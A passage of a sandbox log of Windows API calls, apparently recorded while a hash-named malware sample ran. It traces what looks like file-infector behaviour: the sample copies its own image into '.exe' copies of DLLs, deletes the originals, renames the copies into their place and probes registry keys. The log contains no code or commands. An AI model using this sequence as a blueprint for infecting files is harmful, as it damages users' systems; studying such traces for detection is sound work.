"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegQueryValueExW","FAILURE","","hKey->0x000001cc","lpValueName->NoSharedDocuments"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","system","LoadLibraryA","SUCCESS","0x5b860000","lpFileName->netapi32"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","CreateFileW","SUCCESS","0x000001c0","lpFileName->\\.\PIPE\wkssvc","dwDesiredAccess->GENERIC_READ | GENERIC_WRITE"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","MoveFileWithProgressW","SUCCESS","","lpExistingFileName->C:\cuckoo\additional\.gitignore.exe","lpNewFileName->C:\cuckoo\additional\.gitignore"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","CreateFileW","SUCCESS","0x000000b8","lpFileName->C:\cuckoo\dll\cmonitor.dll","dwDesiredAccess->GENERIC_READ"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToRead->268"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","CreateFileW","SUCCESS","0x000000b8","lpFileName->C:\f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","dwDesiredAccess->GENERIC_READ"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","CreateFileW","SUCCESS","0x000001d8","lpFileName->C:\cuckoo\dll\cmonitor.dll","dwDesiredAccess->GENERIC_READ"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","CreateFileW","SUCCESS","0x000001dc","lpFileName->C:\cuckoo\dll\cmonitor.dll.exe","dwDesiredAccess->GENERIC_READ | GENERIC_WRITE"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","memory","VirtualAllocEx","SUCCESS","0x00154000","th32ProcessID->432","szExeFile->HelpMe.exe","lpAddress->0x00154000","dwSize->65536","flAllocationType->0x00001000","flProtect->0x00000004"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToRead->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToWrite->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToRead->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToWrite->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToRead->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToWrite->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToRead->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToWrite->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToRead->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToWrite->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToRead->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToWrite->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToRead->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToWrite->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToRead->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToWrite->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToRead->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToWrite->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToRead->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToWrite->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToRead->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToWrite->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToRead->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToWrite->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToRead->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToWrite->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToRead->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToWrite->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToRead->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToWrite->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToRead->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToWrite->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToRead->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToWrite->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToRead->39287"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToWrite->39287"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","memory","VirtualAllocEx","SUCCESS","0x00154000","th32ProcessID->432","szExeFile->HelpMe.exe","lpAddress->0x00154000","dwSize->65536","flAllocationType->0x00001000","flProtect->0x00000004"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001d8","nNumberOfBytesToRead->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToWrite->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001d8","nNumberOfBytesToRead->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToWrite->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001d8","nNumberOfBytesToRead->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToWrite->61440"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001d8","nNumberOfBytesToRead->12288"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToWrite->12288"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToWrite->268"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToWrite->268"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","DeleteFileW","SUCCESS","","lpFileName->C:\cuckoo\dll\cmonitor.dll"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","MoveFileWithProgressW","SUCCESS","","lpExistingFileName->C:\cuckoo\dll\cmonitor.dll.exe","lpNewFileName->C:\cuckoo\dll\cmonitor.dll"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","CreateFileW","SUCCESS","0x000001dc","lpFileName->C:\cuckoo\dll\nUsCkV.dll","dwDesiredAccess->GENERIC_READ"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToRead->268"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","CreateFileW","SUCCESS","0x000001dc","lpFileName->C:\f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","dwDesiredAccess->GENERIC_READ"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","CreateFileW","SUCCESS","0x000001d8","lpFileName->C:\cuckoo\dll\nUsCkV.dll","dwDesiredAccess->GENERIC_READ"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","CreateFileW","SUCCESS","0x000000b8","lpFileName->C:\cuckoo\dll\nUsCkV.dll.exe","dwDesiredAccess->GENERIC_READ | GENERIC_WRITE"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","memory","VirtualAllocEx","SUCCESS","0x00154000","th32ProcessID->148","szExeFile->f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","lpAddress->0x00154000","dwSize->65536","flAllocationType->0x00001000","flProtect->0x00000004"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToRead->61440"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->61440"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToRead->61440"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->61440"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToRead->61440"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->61440"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToRead->61440"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->61440"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToRead->61440"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->61440"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToRead->61440"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->61440"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToRead->61440"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->61440"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToRead->61440"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->61440"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToRead->61440"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->61440"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToRead->61440"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->61440"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToRead->61440"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->61440"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToRead->61440"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->61440"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToRead->61440"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->61440"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToRead->61440"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->61440"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToRead->61440"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->61440"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToRead->61440"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->61440"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToRead->61440"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->61440"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToRead->39287"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->39287"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","memory","VirtualAllocEx","SUCCESS","0x00154000","th32ProcessID->432","szExeFile->HelpMe.exe","lpAddress->0x00154000","dwSize->65536","flAllocationType->0x00001000","flProtect->0x00000004"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001d8","nNumberOfBytesToRead->61440"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->61440"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001d8","nNumberOfBytesToRead->61440"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->61440"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001d8","nNumberOfBytesToRead->61440"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->61440"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001d8","nNumberOfBytesToRead->12288"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->12288"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->268"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->268"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","DeleteFileW","FAILURE","","lpFileName->C:\cuckoo\dll\nUsCkV.dll"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","MoveFileWithProgressW","FAILURE","","lpExistingFileName->C:\cuckoo\dll\nUsCkV.dll.exe","lpNewFileName->C:\cuckoo\dll\nUsCkV.dll"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","CreateFileW","SUCCESS","0x000000b8","lpFileName->C:\cuckoo\dll\ornnwr.dll","dwDesiredAccess->GENERIC_READ"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToRead->268"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","CreateFileW","SUCCESS","0x000000b8","lpFileName->C:\f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","dwDesiredAccess->GENERIC_READ"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","CreateFileW","SUCCESS","0x000001d8","lpFileName->C:\cuckoo\dll\ornnwr.dll","dwDesiredAccess->GENERIC_READ"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegCreateKeyExW","SUCCESS","0x000001c0","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegQueryValueExW","FAILURE","","hKey->0x000001c0","lpValueName->CommonMusic"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","SUCCESS","0x000001c0","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows NT\CurrentVersion\ProfileList"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegQueryValueExW","SUCCESS","","hKey->0x000001c0","lpValueName->ProfilesDirectory"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","SUCCESS","0x000001c0","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows NT\CurrentVersion\ProfileList"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegQueryValueExW","SUCCESS","","hKey->0x000001c0","lpValueName->AllUsersProfile"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegCreateKeyExW","SUCCESS","0x000001c0","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegSetValueExW","SUCCESS","","hKey->0x000001c0","lpValueName->CommonMusic","dwType->1","lpData->C:\Documents and Settings\All Users\Documents\My Music","cbData->110"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","SUCCESS","0x000001c0","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","SUCCESS","0x000001cc","hKey->0x000001c0","lpSubKey->{a20cd692-8e41-11e1-9999-806d6172696f}\"
"20190731004116.587","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegQueryValueExW","SUCCESS","","hKey->0x000001cc","lpValueName->Generation"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","CreateFileW","SUCCESS","0x000001cc","lpFileName->C:\cuckoo\dll\ornnwr.dll.exe","dwDesiredAccess->GENERIC_READ | GENERIC_WRITE"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","memory","VirtualAllocEx","SUCCESS","0x00154000","th32ProcessID->432","szExeFile->HelpMe.exe","lpAddress->0x00154000","dwSize->65536","flAllocationType->0x00001000","flProtect->0x00000004"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToRead->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001cc","nNumberOfBytesToWrite->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToRead->61440"
